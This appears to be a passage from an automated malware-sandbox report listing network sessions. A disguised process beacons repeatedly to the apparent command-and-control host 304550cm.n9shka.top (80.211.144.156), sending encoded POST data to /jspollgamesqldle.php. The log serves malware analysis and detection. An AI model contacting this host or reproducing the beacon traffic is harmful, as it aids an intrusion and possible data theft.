                                                          Sep 8, 2024 11:53:05.160773039 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          70 | 192.168.2.4 | 64760 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:05.297557116 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:05.650242090 CEST | 2528 | OUT | Data Raw: 5e 5b 59 51 5f 5e 5b 58 5c 5a 51 56 57 5b 57 54 50 5b 5e 58 54 5d 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^[YQ_^[X\ZQVW[WTP[^XT]SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%],=?9\#0*/+'?9[-4('9"*)&0$8\.#G X/%
                                                          Sep 8, 2024 11:53:05.971498013 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:06.102442980 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:05 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          71 | 192.168.2.4 | 64761 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:06.233740091 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          72 | 192.168.2.4 | 64762 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:06.359931946 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1400
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:06.712753057 CEST | 1400 | OUT | Data Raw: 5e 59 5c 55 5f 5f 5b 5d 5c 5a 51 56 57 5b 57 54 50 5c 5e 5a 54 5e 53 45 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^Y\U__[]\ZQVW[WTP\^ZT^SETRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/1*=)^# 0]>Z#]%?!]8($<52</38.#G X/%
                                                          Sep 8, 2024 11:53:07.026335001 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:07.229849100 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:06 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 25 0e 24 3f 03 5c 35 3e 2b 53 29 2c 21 50 2d 2d 34 5b 3e 5f 35 07 29 1d 38 55 29 11 26 5f 3f 2b 21 07 2b 3c 3b 03 20 1f 33 1f 26 35 28 5e 03 11 23 5e 23 3e 08 58 29 2a 29 07 29 57 2c 5e 29 2f 09 12 22 42 3c 52 23 38 34 11 37 38 2a 56 3c 29 2d 0e 3b 42 21 09 2d 33 32 54 21 34 2d 57 0c 12 20 57 28 10 3b 51 22 30 39 1b 25 00 1c 05 33 08 0b 00 29 28 3a 50 28 5e 32 59 24 22 05 1c 30 3d 32 03 2b 28 0c 15 24 07 3f 5b 36 2d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: %$?\5>+S),!P--4[>_5)8U)&_?+!+<; 3&5(^#^#>X)*))W,^)/"B<R#8478*V<)-;B!-32T!4-W W(;Q"09%3)(:P(^2Y$"0=2+($?[6-$S-"T=\V


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          73 | 192.168.2.4 | 64763 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:06.482542038 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:07.167747021 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:07.300446987 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:06 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          74          192.168.2.4  64764        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:07.439924002 CEST  295                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:08.101349115 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:08.228708029 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:07 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          75          192.168.2.4  64765        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:08.355562925 CEST  295                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:09.028997898 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:09.238809109 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:08 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          76          192.168.2.4  64766        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:09.371566057 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:10.056507111 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:10.263293982 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:09 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          77          192.168.2.4  64767        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:10.387953997 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:11.054888010 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:11.188795090 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:10 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          78          192.168.2.4  64768        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:11.310095072 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:11.977108002 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:12.180708885 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          79          192.168.2.4  64769        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:12.252726078 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          80          192.168.2.4  64770        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:12.310857058 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:13.177074909 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:13.193813086 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:13.197818995 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:12 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          81          192.168.2.4  64771        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:13.330307961 CEST  295                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:14.003334045 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:14.208472967 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:13 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          82          192.168.2.4  64772        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:14.340343952 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:15.004048109 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:15.212975979 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:14 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          83          192.168.2.4  64773        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:15.340979099 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:16.008153915 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:16.136841059 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:15 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          84          192.168.2.4  64774        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:16.261452913 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:16.955614090 CEST  25                 IN         HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:17.088589907 CEST  158                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:16 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          85          192.168.2.4  64775        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:17.215267897 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          86          192.168.2.4  64776        80.211.144.156  80                764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:53:17.312753916 CEST  319                OUT        POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:17.976325989 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:18.104505062 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:17 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          87 | 192.168.2.4 | 64777 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:17.434405088 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:18.115796089 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:18.393701077 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:17 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          88 | 192.168.2.4 | 64778 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:18.527678013 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:53:19.219105005 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:19.425755978 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:18 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          89 | 192.168.2.4 | 64779 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:19.558459997 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:20.227173090 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:20.435189009 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:19 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          90 | 192.168.2.4 | 64780 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:20.562295914 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:21.254877090 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:21.390332937 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:20 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          91 | 192.168.2.4 | 64781 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:21.514278889 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:22.181226969 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:22.308634996 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:21 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          92 | 192.168.2.4 | 64782 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:22.433754921 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:23.105921030 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          93 | 192.168.2.4 | 64783 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:53:23.125055075 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:53:23.799460888 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:53:24.004053116 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:53:23 GMT
                                                          Content-Type: text/html; charset=UTF-8
